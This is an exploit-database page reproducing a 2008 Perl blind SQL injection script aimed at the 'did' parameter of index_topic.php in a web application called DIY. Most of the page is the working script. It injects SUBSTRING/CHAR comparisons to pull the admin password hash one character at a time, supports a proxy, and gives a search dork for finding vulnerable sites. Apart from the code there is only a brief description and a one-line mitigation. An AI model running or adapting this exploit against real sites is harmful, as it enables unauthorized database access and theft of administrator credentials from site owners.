header-logo
Suggest Exploit
vendor:
N/A
by:
Mr.SQL
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

DIY Blind SQL Injection Exploit ( index_topic did )

This exploit is a DIY Blind SQL Injection Exploit which uses the index_topic.php did parameter to inject malicious SQL code into the vulnerable application. It is written in Perl and can be used to gain access to the database of the vulnerable application.

Mitigation:

Input validation and proper sanitization of user input should be implemented to prevent SQL injection attacks.
Source

Exploit-DB raw data:

#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1])
{
  print "                                                                  \n";
  print "   ################## VIVA ISlAME VIVA ISLAME ####################\n";
  print "   ################## VIVA ISlAME VIVA ISLAME ####################\n";
  print "   ##                                                           ##\n";
  print "   ##   DIY Blind SQL Injection Exploit ( index_topic did )     ##\n";
  print "   ##                                                           ##\n";
  print "   ##   Author: Mr.SQL                                          ##\n";
  print "   ##   EMAIL : SQL<at>HOTMAIL.IT                                   ##\n";
  print "   ##   HOME  : WwW.PaL-HaCkEr.CoM                              ##\n";
  print "   ##                                                           ##\n";
  print "   ##              -((:: GrE3E3E3E3E3ETZz ::))-                 ##\n";
  print "   ##                                                           ##\n";
  print "   ## - HaCkEr_EGy - His0k4 - Dark MaSTer - MoHaMaD AL 3rab -   ##\n";
  print "   ##              - ALwHeD -  HeBarIeH   -                     ##\n";
  print "   ##                                                           ##\n";
  print "   ##               <<>>   MuSliMs HaCkErS   <<>>               ##\n";
  print "   ##                                                           ##\n";
  print "   ##                                                           ##\n";
  print "   ##   Usage  : perl exploit.pl host                           ##\n";
  print "   ##   Example: perl exploit.pl www.host.com / -d 10           ##\n";
  print "   ##   D0rk   : allinurl: index_topic.php did                  ##\n";
  print "   ##                                                           ##\n";
  print "   ##   Options:                                                ##\n";
  print "   ##     -d    valid did  value                                ##\n";
  print "   ##   Note:                                                   ##\n";
  print "   ##   Don't forget to change the match if you have to do it   ##\n";
  print "   ##                                                           ##\n";
  print "   ###############################################################\n";
  print "   ###############################################################\n";
  exit;
}
my $host    = $ARGV[0];
my $path    = $ARGV[1];
my $userid  = 1;
my $did     = $ARGV[2];
my %options = ();
GetOptions(\%options, "u=i", "p=s", "d=i");
print "[~] Exploiting...\n";
if($options{"u"})
{
  $userid = $options{"u"};
}
if($options{"d"})
{
  $did = $options{"d"};
}
syswrite(STDOUT, "[~] MD5-Hash: ", 14);
for(my $i = 1; $i <= 32; $i++)
{
  my $f = 0;
  my $h = 48;
  while(!$f && $h <= 57)
  {
    if(istrue2($host, $path, $userid, $did, $i, $h))
    {
      $f = 1;
      syswrite(STDOUT, chr($h), 1);
    }
    $h++;
  }
  if(!$f)
  {
    $h = 97;
    while(!$f && $h <= 122)
    {
      if(istrue2($host, $path, $userid, $did, $i, $h))
      {
        $f = 1;
        syswrite(STDOUT, chr($h), 1);
      }
      $h++;
    }
  }
}
print "\n[~] Exploiting done\n";
sub istrue2
{
  my $host  = shift;
  my $path  = shift;
  my $uid   = shift;
  my $did   = shift;
  my $i     = shift;
  my $h     = shift;
 
  my $ua = LWP::UserAgent->new;
  my $query = "http://".$host.$path."index_topic.php?did=".$did." and (SUBSTRING((SELECT password FROM admin LIMIT 0,1),".$i.",1))=CHAR(".$h.")";
 
  if($options{"p"})
  {
    $ua->proxy('http', "http://".$options{"p"});
  }
 
  my $resp = $ua->get($query);
  my $content = $resp->content;
  my $regexp = "tourterms.pdf";
 
  if($content =~ /$regexp/)
  {
    return 1;
  }
  else
  {
    return 0;
  }
}

# milw0rm.com [2008-06-14]